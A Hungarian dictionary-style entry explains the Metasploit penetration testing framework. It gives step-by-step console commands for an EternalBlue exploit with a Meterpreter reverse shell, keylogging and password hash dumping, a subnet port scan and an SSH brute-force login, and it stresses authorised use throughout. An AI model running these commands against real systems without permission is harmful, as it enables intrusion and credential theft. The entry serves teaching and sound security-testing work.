Metasploit Framework
Főnév
Metasploit Framework (tsz. Metasploit Frameworks)
- (informatika) A Metasploit Framework egy nyílt forráskódú penetrációs tesztelési platform, amelyet eredetileg H. D. Moore fejlesztett ki 2003-ban, majd később a Rapid7 vette át a fejlesztését. A Metasploit célja, hogy a biztonsági szakértők, etikus hackerek és rendszergazdák képesek legyenek sebezhetőségek azonosítására, kiaknázására (exploitálására), és a rendszerek biztonságának tesztelésére – legálisan, kontrollált környezetben.
Ez a keretrendszer a legszélesebb körben használt eszköz a penetrációs teszteléshez, és egyfajta „svájci bicskának” számít az etikus hackelés világában.
🧠 Mi is az a Metasploit?
A Metasploit egy moduláris rendszer, amely lehetővé teszi különféle komponensek (exploitok, payloadok, encoder-ek, segédprogramok) rugalmas összekapcsolását. A felhasználó kiválaszthat egy sebezhetőséget, majd egy megfelelő exploitot futtathat, amellyel átveheti az irányítást a célrendszer fölött – persze csak etikus és jogos környezetben (pl. saját laborgép, ügyfélengedéllyel tesztelt rendszer).
⚙️ A Metasploit fő komponensei
| Modul típus | Leírás |
|---|---|
| Exploit | Kihasznál egy ismert sebezhetőséget a célrendszeren |
| Payload | Kód, amelyet a támadó a célgépbe juttat, pl. reverse shell |
| Encoder | A payload módosítása, hogy elkerülje a vírusirtókat |
| Auxiliary | Egyéb hasznos modulok: port scanner, sniffer, brute forcer |
| Post | Sikeres támadás utáni modulok: jelszólopás, információgyűjtés |
| NOP | No Operation – padding az exploitban |
🔧 Telepítés és környezet
A Metasploit telepíthető:
- Kali Linux – előre telepítve van.
- Ubuntu / Debian – csomagból vagy forrásból.
- Windows – letölthető a Rapid7 honlapjáról.
- Docker – konténeres környezetben is működik.
Indítás:
msfconsole
Ez a Metasploit parancssori kezelőfelülete, ahol interaktív módon adhatók ki utasítások.
💥 Egyszerű exploit futtatás lépésről lépésre
Cél kiválasztása:
- IP-cím, portok, OS-információ – pl. nmap vagy recon modulokkal.
Exploit kiválasztása:
use exploit/windows/smb/ms17_010_eternalblueCél beállítása:
set RHOST 192.168.1.100
Payload kiválasztása:
set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50
Futtatás:
exploit
Ha sikeres, a támadó hozzáférést kap a célgépen, pl. Meterpreter shellen keresztül.
🐚 Meterpreter – a Metasploit „szuper” shellje
A Meterpreter egy dinamikus, titkosított shell, amely lehetővé teszi a támadó számára, hogy:
- Fájlokat töltsön fel/le
- Képernyőképet készítsen
- Billentyűleütéseket rögzítsen
- Jelszavakat dumpoljon
- Hálózati információkat gyűjtsön
Példa parancsok:
sysinfo
getuid
screenshot
keyscan_start
hashdump
🛠️ Auxiliary modulok – nem csak exploit
Használható például portszkennelésre:
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run
Vagy jelszótörésre:
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.10
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
🕵️♂️ Post-exploitation lehetőségek
Miután bejutottunk egy rendszerbe:
- Privilege escalation – rendszergazdai jogok szerzése.
- Network pivoting – új belső célpontok elérése.
- Credential dumping – mentett jelszavak és hash-ek megszerzése.
- Persistence – rejtett hozzáférés biztosítása későbbre.
📚 Adatbázisok és keresés
A Metasploit több ezer modult tartalmaz. Keresés például:
search type:exploit name:ftp
Vagy adott CVE-re:
search cve:2017-0144
Modul információ:
info exploit/windows/smb/ms17_010_eternalblue
🔐 Etikus hackelés célja Metasploittal
- Biztonsági hibák azonosítása vállalati vagy tanulási célból.
- Red team gyakorlatok során behatolás szimulálása.
- Blue team tesztelés – megtudni, hogy mit kell védeni.
- Oktatás – gyakorlati labor, tanfolyamok, CTF-ek.
❗ Fontos: Csak engedélyezett környezetben használható! Engedély nélküli használat jogsértés és bűncselekmény!
🧠 Előnyök
| Előny | Magyarázat |
|---|---|
| Teljes funkcionalitású keretrendszer | Exploit, post, aux, shell, brute-force egyben |
| Ingyenes és nyílt forrású | Teljes hozzáférés, bővíthető |
| Széles közösségi támogatás | Folyamatos frissítés, exploitok |
| Gyakorlatban használható | Pentest eszközkészlet része, CTF-ekben is |
⚠️ Hátrányok / Kockázatok
| Kihívás | Magyarázat |
|---|---|
| Tanulási görbe meredek lehet | Sok modul, sok beállítás |
| Potenciálisan destruktív | Rossz beállítás → rendszerkár |
| Nem friss exploit mindenre | Néhány exploit elavult vagy nem működik újabb rendszereken |
| Felelőtlen használat jogi következménnyel járhat | Csak engedéllyel használható! |
🧠 Összefoglalás
| Fogalom | Jelentés |
|---|---|
| Metasploit | Etikus hackelési és exploitációs keretrendszer |
| Fő komponensek | Exploit, Payload, Auxiliary, Post |
| Legfontosabb shell | Meterpreter |
| Alkalmazás | Penetrációs teszt, gyakorlás, oktatás |
| Etikai korlátok | Csak legálisan, saját vagy engedélyezett környezetben |
A Metasploit az egyik legerősebb és legsokoldalúbb eszköz az etikus hackerek kezében, de mint minden „fegyver”, csak megfelelő kezekben hasznos.
- Metasploit Framework - Szótár.net (en-hu)
- Metasploit Framework - Sztaki (en-hu)
- Metasploit Framework - Merriam–Webster
- Metasploit Framework - Cambridge
- Metasploit Framework - WordNet
- Metasploit Framework - Яндекс (en-ru)
- Metasploit Framework - Google (en-hu)
- Metasploit Framework - Wikidata
- Metasploit Framework - Wikipédia (angol)